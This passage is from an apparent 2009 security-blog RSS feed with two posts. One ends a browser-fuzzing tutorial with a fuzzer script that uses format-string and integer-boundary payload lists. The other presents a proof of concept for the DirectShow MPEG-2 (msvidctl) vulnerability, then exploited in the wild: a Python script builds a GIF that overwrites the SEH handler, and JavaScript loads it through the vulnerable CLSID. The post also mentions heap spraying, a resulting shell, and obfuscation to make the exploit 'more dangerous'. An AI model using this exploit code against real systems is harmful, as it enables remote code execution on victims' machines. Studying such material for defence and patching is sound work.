fmtstring = <span style="color: black;">&#91;</span><span style="color: #483d8b;">'%n%n%n%n%n'</span>, <span style="color: #483d8b;">'%p%p%p%p%p'</span>, <span style="color: #483d8b;">'%s%s%s%s%s'</span>, <span style="color: #483d8b;">'%d%d%d%d%d'</span>, <span style="color: #483d8b;">'%x%x%x%x%x'</span><span style="color: black;">&#93;</span>
numbers   = <span style="color: black;">&#91;</span><span style="color: #483d8b;">'0'</span>, <span style="color: #483d8b;">'-0'</span>, <span style="color: #483d8b;">'1'</span>, <span style="color: #483d8b;">'-1'</span>, <span style="color: #483d8b;">'32767'</span>, <span style="color: #483d8b;">'-32768'</span>, <span style="color: #483d8b;">'2147483647'</span>, <span style="color: #483d8b;">'-2147483647'</span>, <span style="color: #483d8b;">'2147483648'</span>, <span style="color: #483d8b;">'-2147483648'</span><span style="color: black;">&#93;</span>
&nbsp;
<span style="color: #808080; font-style: italic;"># FONT property</span>
fontpropery = <span style="color: black;">&#91;</span><span style="color: #483d8b;">'color'</span>, <span style="color: #483d8b;">'face'</span>, <span style="color: #483d8b;">'size'</span>, <span style="color: #483d8b;">'class'</span>, <span style="color: #483d8b;">'id'</span>, <span style="color: #483d8b;">'style'</span>, <span style="color: #483d8b;">'title'</span>, <span style="color: #483d8b;">'dir'</span>, <span style="color: #483d8b;">'lang'</span>, <span style="color: #483d8b;">'accesskey'</span>, <span style="color: #483d8b;">'tabindex'</span><span style="color: black;">&#93;</span>
&nbsp;
<span style="color: #808080; font-style: italic;">#basic Automated Fuzzer :</span>
i = <span style="color: #ff4500;">0</span> 
&nbsp;
<span style="color: #ff7700;font-weight:bold;">for</span> x <span style="color: #ff7700;font-weight:bold;">in</span> fontpropery:
     <span style="color: #ff7700;font-weight:bold;">for</span> y <span style="color: #ff7700;font-weight:bold;">in</span> overflows:
    	tag = <span style="color: #483d8b;">&quot;&lt;span&gt;TEST&lt;/span&gt;&quot;</span>
    	i = i + <span style="color: #ff4500;">1</span>
	<span style="color: #008000;">file</span> = <span style="color: #008000;">open</span><span style="color: black;">&#40;</span> <span style="color: #008000;">str</span><span style="color: black;">&#40;</span>i<span style="color: black;">&#41;</span> + <span style="color: #483d8b;">&quot;.html&quot;</span>,<span style="color: #483d8b;">&quot;w&quot;</span><span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">writelines</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">''</span><span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">writelines</span><span style="color: black;">&#40;</span>tag<span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
&nbsp;
     <span style="color: #ff7700;font-weight:bold;">for</span> y <span style="color: #ff7700;font-weight:bold;">in</span> fmtstring:
    	tag =  <span style="color: #483d8b;">&quot;&lt;span&gt;TEST&lt;/span&gt;&quot;</span>
    	i = i + <span style="color: #ff4500;">1</span>
	<span style="color: #008000;">file</span> = <span style="color: #008000;">open</span><span style="color: black;">&#40;</span> <span style="color: #008000;">str</span><span style="color: black;">&#40;</span>i<span style="color: black;">&#41;</span> + <span style="color: #483d8b;">&quot;.html&quot;</span>,<span style="color: #483d8b;">&quot;w&quot;</span><span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">writelines</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">''</span><span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">writelines</span><span style="color: black;">&#40;</span>tag<span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
&nbsp;
     <span style="color: #ff7700;font-weight:bold;">for</span> y <span style="color: #ff7700;font-weight:bold;">in</span> numbers:
    	tag =  <span style="color: #483d8b;">&quot;&lt;span&gt;TEST&lt;/span&gt;&quot;</span>
    	i = i + <span style="color: #ff4500;">1</span>
	<span style="color: #008000;">file</span> = <span style="color: #008000;">open</span><span style="color: black;">&#40;</span> <span style="color: #008000;">str</span><span style="color: black;">&#40;</span>i<span style="color: black;">&#41;</span> + <span style="color: #483d8b;">&quot;.html&quot;</span>,<span style="color: #483d8b;">&quot;w&quot;</span><span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">writelines</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">''</span><span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">writelines</span><span style="color: black;">&#40;</span>tag<span style="color: black;">&#41;</span>
	<span style="color: #008000;">file</span>.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span></pre></div></div>

<p>for start fuzzing , add refresh page with next page . [for start fuzz click 1.html]</p>
<p><strong>another way :</strong></p>
<p>&#8220;Jeremy Brown&#8221;  developed this a fuzzer for general browser fuzzing&#8221; :</p>
<ol>
<li>Written in PERL</li>
<li>CSS/DOM/HTML/JS fuzzing comprehensive</li>
<li>Specialized functions for fuzz page generation &amp; writing</li>
<li>Decent file structure easily supporting add/del/modification</li>
<li>3rd generation [unlimited style, web] fuzzing oracle implemented</li>
</ol>
<p><a href="http://www.krakowlabs.com/dev/fuz/bf2/bf2.pl.txt">http://www.krakowlabs.com/dev/fuz/bf2/bf2.pl.txt</a></p>
<p>this fuzzer is good but it&#8217;s really simple too and can&#8217;t find new vulnerabilities without modifying but   you can extend it for new method of browser &lt;tag &gt; fuzz .</p>
<p>more info :</p>
<p><a href="http://www.krakowlabs.com/dev/fuz/bf2/bf2_doc.txt">http://www.krakowlabs.com/dev/fuz/bf2/bf2_doc.txt</a></p>
<p><strong>Browser Auditing :</strong></p>
<p>browser source code auditing  is actually white-box testing  and only is useful when you have  an open source browser like  Firefox  and &#8230;. .</p>
<p>source code auditing is really practical , but need higher then  knowledge in programming (always C/C++)<br />
for example , in firefox :<br />
you can download all versions  source code from here :<br />
<a href="ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases">ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases</a></p>
<p>more source code of FF written by C++ , my interested  C++ source code Auditor is : CPPcheck<br />
<a href="http://sourceforge.net/apps/mediawiki/cppcheck">http://sourceforge.net/apps/mediawiki/cppcheck</a></p>
<p>Important point that we understand from this Post :<br />
why we can&#8217;t found bugs from this ways ?<br />
i try to answer this question in future post .</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>and this write-up is for  tell you we are &#8220;not dead&#8221;</p>
<p>wait for out new advisories + exploits soon as soon possible</p>
<p>god speed you</p>
<p>Daphne<br />
&#8212;&#8212;&#8212;&#8211;<br />
unfortunately  , we had mistake in our simple fuzzer , now edit &amp; repaired .<br />
thanks .<br />
Daphne /</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2009/08/21/how-to-write-browser-fuzzer/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Microsft Directshow and MPEG-2 Exploitation</title>
		<link>http://www.abysssec.com/blog/2009/07/10/microsft-directshow-and-mpeg-2-exploitation/</link>
		<comments>http://www.abysssec.com/blog/2009/07/10/microsft-directshow-and-mpeg-2-exploitation/#comments</comments>
		<pubDate>Fri, 10 Jul 2009 14:01:13 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[Exploits / BUG Decryption]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Directshow]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[MPEG-2]]></category>
		<category><![CDATA[seh]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=359</guid>
		<description><![CDATA[hello we are really sorry for too late updates. but we are busy but i have some good news and i will share with you soon . for  now i want to have short talk about new DirectShow vulnerabilities  one of this vulnerability is more fun and exploited in the wild in past days .and [...]]]></description>
			<content:encoded><![CDATA[<p>hello we are really sorry for too late updates.</p>
<p>but we are busy but i have some good news and i will share with you soon . for  now i want to have short talk about new DirectShow vulnerabilities  one of this vulnerability is more fun and exploited in the wild in past days .and now exploit is  available in the wild.</p>
<p>anyway here is orginal advisory  (another good vulnerability from alex wheeler):</p>
<p>http://www.microsoft.com/technet/security/advisory/972890.mspx</p>
<p>this vulnerability can be exploit using  varient browser exploitation method like Heap Spray.</p>
<p>and flowing simple script can trigger vulnerabilty :</p>

<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">#!/usr/bin/python</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">sys</span> , <span style="color: #dc143c;">os</span>
&nbsp;
gif =  <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>03<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>11<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>34<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
gif += <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
gif += <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
gif += <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>FF<span style="color: #000099; font-weight: bold;">\x</span>FF<span style="color: #000099; font-weight: bold;">\x</span>FF<span style="color: #000099; font-weight: bold;">\x</span>FF&quot;</span>    <span style="color: #808080; font-style: italic;"># End of SEH chain</span>
gif += <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>41&quot;</span>    <span style="color: #808080; font-style: italic;"># SE Handler</span>
gif += <span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
&nbsp;
fp = <span style="color: #008000;">open</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">&quot;directshow.gif&quot;</span>,<span style="color: #483d8b;">&quot;wb&quot;</span><span style="color: black;">&#41;</span>
fp.<span style="color: black;">write</span><span style="color: black;">&#40;</span>gif<span style="color: black;">&#41;</span>
fp.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span></pre></div></div>


<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">var</span> myObject<span style="color: #339933;">=</span>document.<span style="color: #660066;">createElement</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">'object'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
DivID.<span style="color: #660066;">appendChild</span><span style="color: #009900;">&#40;</span>myObject<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
myObject.<span style="color: #660066;">width</span><span style="color: #339933;">=</span><span style="color: #3366CC;">'1'</span><span style="color: #339933;">;</span>
myObject.<span style="color: #660066;">height</span><span style="color: #339933;">=</span><span style="color: #3366CC;">'1'</span><span style="color: #339933;">;</span>
myObject.<span style="color: #660066;">data</span><span style="color: #339933;">=</span><span style="color: #3366CC;">'directshow.gif;
// Vulnerable ID
myObject.classid='</span>clsid<span style="color: #339933;">:</span>0955AC62<span style="color: #339933;">-</span>BF2E<span style="color: #339933;">-</span>4CBA<span style="color: #339933;">-</span>A2B9<span style="color: #339933;">-</span>A63F772D46CF<span style="color: #3366CC;">';</span></pre></div></div>

<p style="text-align: center;"><img class="aligncenter" title="stack" src="http://i27.tinypic.com/ju7srl.png" alt="" width="538" height="323" /></p>
<p style="text-align: center;">here you can see overwritten SEH</p>
<p style="text-align: center;"><img class="aligncenter" title="Spray" src="http://i30.tinypic.com/b9g36d.png" alt="" width="503" height="233" />and here you can see Spared Heap</p>
<p style="text-align: center;">
<p style="text-align: center;"><img class="aligncenter" title="Shell" src="http://i32.tinypic.com/243546o.png" alt="" width="468" height="125" /></p>
<p style="text-align: center;">finally as you can see here we got a shell</p>
<p style="text-align: center;">
<p style="text-align: left;">using methods like java-script obfuscation and shirking variables can make this exploit more dangerous . and you can find this exploit at :</p>
<p style="text-align: left;">http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/browser/msvidctl_mpeg2.rb</p>
<p style="text-align: left;">and:</p>
<p style="text-align: left;">http://milw0rm.com/exploits/9108</p>
<p style="text-align: left;">Happy Hunting.</p>
<p style="text-align: left;">PS : i will try to have a technical post soon as soon possible</p>
<p style="text-align: left;">Cheers .</p>
<p style="text-align: left;">shahin</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2009/07/10/microsft-directshow-and-mpeg-2-exploitation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

